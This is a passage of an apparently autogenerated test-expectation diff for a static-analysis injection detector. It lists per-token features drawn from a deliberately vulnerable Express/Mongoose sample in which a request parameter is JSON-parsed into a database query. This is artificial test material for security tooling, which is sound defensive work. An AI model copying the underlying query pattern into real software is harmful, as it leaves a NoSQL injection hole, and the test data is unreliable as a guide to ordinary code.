autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:17:13:20 | true | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:13:17:13:20 | true | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:8 | type | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:8 | type | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:8 | type | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:16 | type: String | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:16 | type: String | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:16 | type: String | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:16 | type: String | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:16 | type: String | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:5:15:16 | type: String | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:11:15:16 | String | CalleeFlexibleAccessPath | Mongoose.model | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:11:15:16 | String | InputAccessPathFromCallee | 1.type | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:11:15:16 | String | InputArgumentIndex | 1 | @@ -3158,6 +15330,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:11:15:16 | String | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:11:15:16 | String | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:15:11:15:16 | String | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:18:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:18:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:18:3 | app | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:18:7 | app.get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:18:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:18:7 | app.get | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:24:2 | app.get ... ry);\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:24:2 | app.get ... ry);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:24:2 | app.get ... ry);\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:24:2 | exceptional return of app.get ... ry);\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:24:2 | exceptional return of app.get ... ry);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:1:24:2 | exceptional return of app.get ... ry);\\n}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:5:18:7 | get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:5:18:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:5:18:7 | get | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:9:18:25 | '/documents/find' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:9:18:25 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:9:18:25 | '/documents/find' | calleeImports | express | @@ -3165,6 +15352,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:9:18:25 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:9:18:25 | '/documents/find' | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:9:18:25 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:18:27 | Document | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:18:27 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:18:27 | Document | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:18:27 | Document | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:18:27 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | (req, r ... ery);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | (req, r ... ery);\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | (req, r ... ery);\\n} | calleeImports | express | @@ -3172,11 +15369,112 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | (req, r ... ery);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | (req, r ... ery);\\n} | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | (req, r ... ery);\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | return of anonymous function | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:28:24:1 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:29:18:31 | req | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:34:18:36 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:34:18:36 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:34:18:36 | res | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:34:18:36 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:18:34:18:36 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:15 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:15 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:15 | query | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:15 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:15 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query = {} | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query = {} | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query = {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:11:19:20 | query = {} | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:19:19:20 | {} | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:19:19:20 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:19:19:20 | {} | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:19:19:20 | {} | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:19:19:20 | {} | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:9 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:9 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:9 | query | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:9 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:9 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:15 | query.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:15 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:15 | query.title | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:15 | query.title | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:15 | query.title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:50 | query.t ... ).title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:50 | query.t ... ).title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:50 | query.t ... ).title | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:50 | query.t ... ).title | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:5:20:50 | query.t ... ).title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:11:20:15 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:11:20:15 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:11:20:15 | title | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:11:20:15 | title | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:11:20:15 | title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:22 | JSON | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:22 | JSON | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:22 | JSON | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:22 | JSON | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:22 | JSON | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:28 | JSON.parse | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:28 | JSON.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:28 | JSON.parse | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:28 | JSON.parse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:28 | JSON.parse | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | exceptional return of JSON.pa ... y.data) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | exceptional return of JSON.pa ... y.data) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | exceptional return of JSON.pa ... y.data) | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | exceptional return of JSON.pa ... y.data) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:44 | exceptional return of JSON.pa ... y.data) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:24:20:28 | parse | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:24:20:28 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:24:20:28 | parse | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:24:20:28 | parse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:24:20:28 | parse | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:32 | req | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:32 | req | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:38 | req.query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:38 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:38 | req.query | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:38 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:38 | req.query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:43 | req.query.data | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:43 | req.query.data | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:43 | req.query.data | contextFunctionInterfaces | | @@ -3185,6 +15483,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:43 | req.query.data | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:43 | req.query.data | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:30:20:43 | req.query.data | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:34:20:38 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:34:20:38 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:34:20:38 | query | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:34:20:38 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:34:20:38 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:40:20:43 | data | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:40:20:43 | data | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:40:20:43 | data | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:40:20:43 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:40:20:43 | data | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:46:20:50 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:46:20:50 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:46:20:50 | title | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:46:20:50 | title | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:20:46:20:50 | title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:12 | Document | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:12 | Document | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:12 | Document | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:17 | Document.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:17 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:17 | Document.find | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:17 | Document.find | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:17 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | Document.find(query) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | Document.find(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | Document.find(query) | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | Document.find(query) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | Document.find(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | exceptional return of Document.find(query) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | exceptional return of Document.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | exceptional return of Document.find(query) | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | exceptional return of Document.find(query) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:5:23:24 | exceptional return of Document.find(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:14:23:17 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:14:23:17 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:14:23:17 | find | enclosingFunctionBody | req res query query title JSON parse req query data title Document find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:14:23:17 | find | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:14:23:17 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:19:23:23 | query | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:19:23:23 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:19:23:23 | query | calleeImports | mongoose | @@ -3194,6 +15532,45 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:19:23:23 | query | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:19:23:23 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:23:19:23:23 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModel.js:1:1:1:0 | this | contextFunctionInterfaces | | +| 